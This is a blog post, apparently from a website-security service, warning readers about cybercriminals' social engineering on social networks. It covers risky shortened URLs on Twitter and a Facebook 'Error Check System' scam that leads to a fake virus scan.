
One other service I investigated, SnipURL.com clearly states on their website:

“SnipURL has a number of operational functions in place to protect the confidentiality of information. However, perfect security on the Internet does not exist, and SnipURL does not warrant that its site is impenetrable or invulnerable to hackers.”

At least they admit that perfect security does not exist, but don’t think that you’re safe clicking on a shortened URL link.

I believe that any free service is going to be exploited by cybercriminals. I’ve seen many times where even fee based services are abused by cybercriminals.

You had better fully trust the person or organization behind the Twitter posting before you blindly click on a shortened link on their site – because you’re either relying on the poster or Twitter. If that little bird in your head is telling you to be careful, you shouldn’t be clicking on it no matter how important you think it might be.

Have you had situations of a security breach on Twitter? If so, let us know by posting a comment.

When we started this service we knew that one of our main goals was to “get the word out” on how websites have been in the line of fire for cybercriminals. We published a report, “How Cybercriminals Use Your Website to Distribute their Malware”, but found not many people were interested in what we had to say. We blamed on it “head in the sand” mentality.

We looked to the Internet Marketing world to see how they do it. Some of them have actually sold thousands of e-books for as much as $27 a piece. They must know some secret that we didn’t.

Our studying introduced us to the works of some big name Internet Marketers (IMers). Names like Frank Kern, Jeff Walker, Brian Clark, Yanik Silver and many others all seemed to resonate one key strategy – build community. On of their favorite strategies is using social networks to build this community of loyal followers.

I shouldn’t say it’s one of their strategies, it’s one of their tactics. Their strategy is to always provide something of value. The social networks is just one way they suggest you use to distribute your valuable message.

Using social networks seemed like a great idea so I set out to explore this value distribution tactic. I did this with my ever present security guard on – that’s how I roll.

My exploration included sites like: Twitter, MySpace, Facebook, LinkedIn and FastPitch.

Over the next few weeks I’ll be revealing my findings and then suggest ways (tactics) you can protect your informational assets while taking advantage of social networks.

I titled this posting “Social Networks & Social Engineering – What a Pair” because many of the tactics of cybercriminals revolve around social engineering which is the art of deceiving others into clicking on a link that you think is safe.

As I write this, I’ve been bombarded with emails about people who received errors while trying to view your profile on Facebook. What happens is when someone clicks on your profile they get an error saying that they could find out the problem by installing the “Error Check System”. You’ll get notifications that “X” number of people have been getting errors while viewing your profile and this “application” will help you determine the cause.

If you Google “Error Check System” Facebook, at least one of the links takes you to an infectious website that will display a message telling you you’re infected with a virus and offers to scan your system. Of course, this is a social engineering attempt. If you agree to the scan, you’ll be downloading a virus. This has been a very popular tactic of cybercriminals lately. They have even started creating websites that offer reviews of anti-virus software – more social engineering, to earn your trust.

I thought the timing of this Facebook “Error Check System” scam was perfect for me to start this series.

Come on back and read the follow-ups.

If you’ve had any experiences with one of the social networking sites, post a comment and let us know.